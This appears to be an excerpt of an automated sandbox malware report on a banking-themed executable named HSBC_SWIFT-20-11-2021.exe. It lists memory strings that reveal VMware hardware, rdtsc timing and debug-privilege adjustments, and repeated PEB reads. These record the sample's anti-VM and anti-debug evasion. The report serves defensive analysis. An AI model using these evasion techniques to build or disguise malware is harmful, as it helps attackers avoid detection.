          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bv
          Source: explorer.exe, 0000001C.00000003.601187918.0000000005A0B000.00000004.00000001.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bl
          Source: explorer.exe, 0000001C.00000000.610554099.000000000600C000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
          Source: explorer.exe, 0000001C.00000003.562192486.000000000591C000.00000004.00000001.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001C.00000003.602842153.000000001055A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BF
          Source: explorer.exe, 0000001C.00000003.562119015.00000000058E8000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZ
          Source: explorer.exe, 0000001C.00000000.610554099.000000000600C000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000001C.00000003.588792526.00000000059A3000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.601187918.0000000005A0B000.00000004.00000001.sdmpBinary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&^
          Source: explorer.exe, 0000001C.00000003.562192486.000000000591C000.00000004.00000001.sdmpBinary or memory string: 11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
          Source: explorer.exe, 0000001C.00000000.538460199.0000000000B3E000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.604332920.0000000010433000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}iT
          Source: explorer.exe, 0000000A.00000000.396831901.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000001C.00000000.603288640.0000000000BEF000.00000004.00000020.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.397006261.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_004088C0 rdtsc 8_2_004088C0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BC182 mov eax, dword ptr fs:[00000030h]8_2_018BC182
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CA185 mov eax, dword ptr fs:[00000030h]8_2_018CA185
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2990 mov eax, dword ptr fs:[00000030h]8_2_018C2990
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C61A0 mov eax, dword ptr fs:[00000030h]8_2_018C61A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C61A0 mov eax, dword ptr fs:[00000030h]8_2_018C61A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019151BE mov eax, dword ptr fs:[00000030h]8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019151BE mov eax, dword ptr fs:[00000030h]8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019151BE mov eax, dword ptr fs:[00000030h]8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019151BE mov eax, dword ptr fs:[00000030h]8_2_019151BE
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h]8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h]8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h]8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019549A4 mov eax, dword ptr fs:[00000030h]8_2_019549A4
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019169A6 mov eax, dword ptr fs:[00000030h]8_2_019169A6
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189B1E1 mov eax, dword ptr fs:[00000030h]8_2_0189B1E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189B1E1 mov eax, dword ptr fs:[00000030h]8_2_0189B1E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189B1E1 mov eax, dword ptr fs:[00000030h]8_2_0189B1E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019241E8 mov eax, dword ptr fs:[00000030h]8_2_019241E8
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899100 mov eax, dword ptr fs:[00000030h]8_2_01899100
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899100 mov eax, dword ptr fs:[00000030h]8_2_01899100
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899100 mov eax, dword ptr fs:[00000030h]8_2_01899100
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h]8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h]8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h]8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B4120 mov eax, dword ptr fs:[00000030h]8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B4120 mov ecx, dword ptr fs:[00000030h]8_2_018B4120
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C513A mov eax, dword ptr fs:[00000030h]8_2_018C513A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C513A mov eax, dword ptr fs:[00000030h]8_2_018C513A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BB944 mov eax, dword ptr fs:[00000030h]8_2_018BB944
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BB944 mov eax, dword ptr fs:[00000030h]8_2_018BB944
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189C962 mov eax, dword ptr fs:[00000030h]8_2_0189C962
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189B171 mov eax, dword ptr fs:[00000030h]8_2_0189B171
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189B171 mov eax, dword ptr fs:[00000030h]8_2_0189B171
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01899080 mov eax, dword ptr fs:[00000030h]8_2_01899080
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01913884 mov eax, dword ptr fs:[00000030h]8_2_01913884
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01913884 mov eax, dword ptr fs:[00000030h]8_2_01913884
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018D90AF mov eax, dword ptr fs:[00000030h]8_2_018D90AF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h]8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h]8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h]8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h]8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h]8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C20A0 mov eax, dword ptr fs:[00000030h]8_2_018C20A0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CF0BF mov ecx, dword ptr fs:[00000030h]8_2_018CF0BF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CF0BF mov eax, dword ptr fs:[00000030h]8_2_018CF0BF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CF0BF mov eax, dword ptr fs:[00000030h]8_2_018CF0BF
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h]8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h]8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h]8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h]8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0192B8D0 mov eax, dword ptr fs:[00000030h]8_2_0192B8D0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018958EC mov eax, dword ptr fs:[00000030h]8_2_018958EC
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018940E1 mov eax, dword ptr fs:[00000030h]8_2_018940E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018940E1 mov eax, dword ptr fs:[00000030h]8_2_018940E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018940E1 mov eax, dword ptr fs:[00000030h]8_2_018940E1
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01964015 mov eax, dword ptr fs:[00000030h]8_2_01964015
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01964015 mov eax, dword ptr fs:[00000030h]8_2_01964015
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917016 mov eax, dword ptr fs:[00000030h]8_2_01917016
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917016 mov eax, dword ptr fs:[00000030h]8_2_01917016
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01917016 mov eax, dword ptr fs:[00000030h]8_2_01917016
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h]8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h]8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h]8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018AB02A mov eax, dword ptr fs:[00000030h]8_2_018AB02A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C002D mov eax, dword ptr fs:[00000030h]8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C002D mov eax, dword ptr fs:[00000030h]8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C002D mov eax, dword ptr fs:[00000030h]8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C002D mov eax, dword ptr fs:[00000030h]8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C002D mov eax, dword ptr fs:[00000030h]8_2_018C002D
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h]8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h]8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h]8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BA830 mov eax, dword ptr fs:[00000030h]8_2_018BA830
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B0050 mov eax, dword ptr fs:[00000030h]8_2_018B0050
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018B0050 mov eax, dword ptr fs:[00000030h]8_2_018B0050
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01961074 mov eax, dword ptr fs:[00000030h]8_2_01961074
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01952073 mov eax, dword ptr fs:[00000030h]8_2_01952073
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A1B8F mov eax, dword ptr fs:[00000030h]8_2_018A1B8F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018A1B8F mov eax, dword ptr fs:[00000030h]8_2_018A1B8F
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0194D380 mov ecx, dword ptr fs:[00000030h]8_2_0194D380
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C2397 mov eax, dword ptr fs:[00000030h]8_2_018C2397
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018CB390 mov eax, dword ptr fs:[00000030h]8_2_018CB390
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195138A mov eax, dword ptr fs:[00000030h]8_2_0195138A
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4BAD mov eax, dword ptr fs:[00000030h]8_2_018C4BAD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4BAD mov eax, dword ptr fs:[00000030h]8_2_018C4BAD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C4BAD mov eax, dword ptr fs:[00000030h]8_2_018C4BAD
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01965BA5 mov eax, dword ptr fs:[00000030h]8_2_01965BA5
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019153CA mov eax, dword ptr fs:[00000030h]8_2_019153CA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_019153CA mov eax, dword ptr fs:[00000030h]8_2_019153CA
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018BDBE9 mov eax, dword ptr fs:[00000030h]8_2_018BDBE9
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_018C03E2 mov eax, dword ptr fs:[00000030h]8_2_018C03E2
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0195131B mov eax, dword ptr fs:[00000030h]8_2_0195131B
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189DB40 mov eax, dword ptr fs:[00000030h]8_2_0189DB40
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_01968B58 mov eax, dword ptr fs:[00000030h]8_2_01968B58
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189F358 mov eax, dword ptr fs:[00000030h]8_2_0189F358
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeCode function: 8_2_0189DB60 mov ecx, dword ptr fs:[00000030h]8_2_0189DB60
